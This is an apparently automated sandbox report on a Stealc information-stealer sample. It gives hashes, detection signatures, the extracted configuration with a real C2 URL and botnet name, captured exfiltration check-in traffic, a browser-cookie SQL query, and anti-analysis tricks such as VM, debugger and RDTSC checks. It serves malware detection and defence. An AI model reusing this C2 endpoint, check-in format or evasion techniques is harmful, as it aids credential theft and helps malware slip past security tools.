
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544128
MD5: 37ad51a72ae2ee4f18f90db961ca42e0
SHA1: 4e981723fa01e7aa8f81b23c734a13b2cdb9e252
SHA256: 33c2bf98bb8da8afa179fd90efc0b686e9eca69ffa2ab5b8163ece46a90ff561
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6552 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 37AD51A72AE2EE4F18F90DB961CA42E0)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2154333507.0000000004B60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6552 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6552 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.110000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-28T21:41:05.720999+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 185.215.113.206 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.110000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: file.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011A2B0 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000003.2154333507.0000000004B8B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000003.2154333507.0000000004B8B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00111710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00123B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00124B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------AECAECFCAAEBFHIEHDGH
    Content-Disposition: form-data; name="hwid"

    7E5474BF2BE41866486636
    ------AECAECFCAAEBFHIEHDGH
    Content-Disposition: form-data; name="build"

    tale
    ------AECAECFCAAEBFHIEHDGH--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected:
    POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------AECAECFCAAEBFHIEHDGH
    Content-Disposition: form-data; name="hwid"

    7E5474BF2BE41866486636
    ------AECAECFCAAEBFHIEHDGH
    Content-Disposition: form-data; name="build"

    tale
    ------AECAECFCAAEBFHIEHDGH--
Source: file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%.&
Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php-
Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/r
Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpW
Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpe/
Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpu.
Source: file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/P
Source: file.exe, file.exe, 00000000.00000003.2154333507.0000000004B8B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00150098
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005730CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057D09D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00142138
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00582129
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016B198
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017E258
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00154288
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019B308
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0018D39E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056C3E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057B4D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013E544
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00134573
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001545A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017D5A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004985AD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0018A648
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058060B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FF62E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00442623
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001566C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001996FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068D75D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016D720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00186799
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00164868
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001698B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016B8A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017F8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005799B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056FA53
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057EA1E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00574AF4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056AB67
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00180B88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00184BA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00604BAD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00178BD9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0018AC28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017AD38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00561D1F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00141D78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016BD68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00165DB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00164DC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00158E78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00181EE8
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00114610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: szuavcfa ZLIB complexity 0.9949861187591776
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00123970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\GOB92GLS.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 2181632 > 1048576
Source: file.exe | Static PE information: Raw size of szuavcfa is bigger than: 0x100000 < 0x1a9a00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.110000.0.unpack :EW;.rsrc :W;.idata :W; :EW;szuavcfa:EW;lozgslii:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;szuavcfa:EW;lozgslii:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x21cca0 should be: 0x22296e
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: szuavcfa
Source: file.exe | Static PE information: section name: lozgslii
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00612047 push ecx; mov dword ptr [esp], 7E3F3F00h (0_2_0061206A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012E02B push cs; iretd (0_2_0012E036)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00657009 push ebp; mov dword ptr [esp], ebx (0_2_0065702C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push 4E48FB59h; mov dword ptr [esp], edx (0_2_0056E04F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push ecx; mov dword ptr [esp], esi (0_2_0056E05B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push 768703AAh; mov dword ptr [esp], edi (0_2_0056E122)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push edx; mov dword ptr [esp], 19365585h (0_2_0056E160)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push edi; mov dword ptr [esp], 6DD033CDh (0_2_0056E1FA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push ebx; mov dword ptr [esp], eax (0_2_0056E2BF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push eax; mov dword ptr [esp], 54A5B707h (0_2_0056E382)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push esi; mov dword ptr [esp], 4EC3CA82h (0_2_0056E491)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push 5B524D41h; mov dword ptr [esp], ebx (0_2_0056E4A6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push esi; mov dword ptr [esp], eax (0_2_0056E4FD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push 5654AD88h; mov dword ptr [esp], edi (0_2_0056E54C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push 7C76FF66h; mov dword ptr [esp], eax (0_2_0056E554)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push ecx; mov dword ptr [esp], 409F48C3h (0_2_0056E580)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push edi; mov dword ptr [esp], 62CE68D2h (0_2_0056E59E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push 188E7A42h; mov dword ptr [esp], edi (0_2_0056E5CA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push ebp; mov dword ptr [esp], ebx (0_2_0056E5EC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push 0253C8F9h; mov dword ptr [esp], ecx (0_2_0056E669)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push ebx; mov dword ptr [esp], edi (0_2_0056E6AB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push ebp; mov dword ptr [esp], 5BD0D8C0h (0_2_0056E775)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push ebp; mov dword ptr [esp], edx (0_2_0056E827)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push ebx; mov dword ptr [esp], 09327C00h (0_2_0056E842)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push edi; mov dword ptr [esp], 262B941Bh (0_2_0056E84D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push 3A87A992h; mov dword ptr [esp], eax (0_2_0056E864)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push ecx; mov dword ptr [esp], edx (0_2_0056E8DF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push eax; mov dword ptr [esp], ecx (0_2_0056E8F1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push esi; mov dword ptr [esp], 55989DADh (0_2_0056E902)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push edi; mov dword ptr [esp], 4B6E6541h (0_2_0056E924)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E025 push edx; mov dword ptr [esp], 7F1F2D8Dh (0_2_0056E939)
Source: file.exe | Static PE information: section name: szuavcfa entropy: 7.954150406224703

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-37643)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3FE263 second address: 3FE268 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5864AD second address: 5864B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 586634 second address: 58664B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F96F934F1ECh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 586A24 second address: 586A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007F96F95D6D66h 0x0000000c popad 0x0000000d jmp 00007F96F95D6D72h 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007F96F95D6D66h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 586BB8 second address: 586BBD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 586D12 second address: 586D18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 586D18 second address: 586D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 586D22 second address: 586D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 586D26 second address: 586D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 586D2C second address: 586D3F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F96F95D6D6Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A159 second address: 58A15F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A15F second address: 58A1C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 0E86DFDBh 0x00000010 jmp 00007F96F95D6D74h 0x00000015 push 00000003h 0x00000017 mov cx, ax 0x0000001a push 00000000h 0x0000001c jmp 00007F96F95D6D79h 0x00000021 push 00000003h 0x00000023 mov dword ptr [ebp+122D2389h], ecx 0x00000029 call 00007F96F95D6D69h 0x0000002e push eax 0x0000002f push edx 0x00000030 jno 00007F96F95D6D6Ch 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A1C9 second address: 58A1CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A1CE second address: 58A1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F96F95D6D76h 0x0000000e jc 00007F96F95D6D6Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
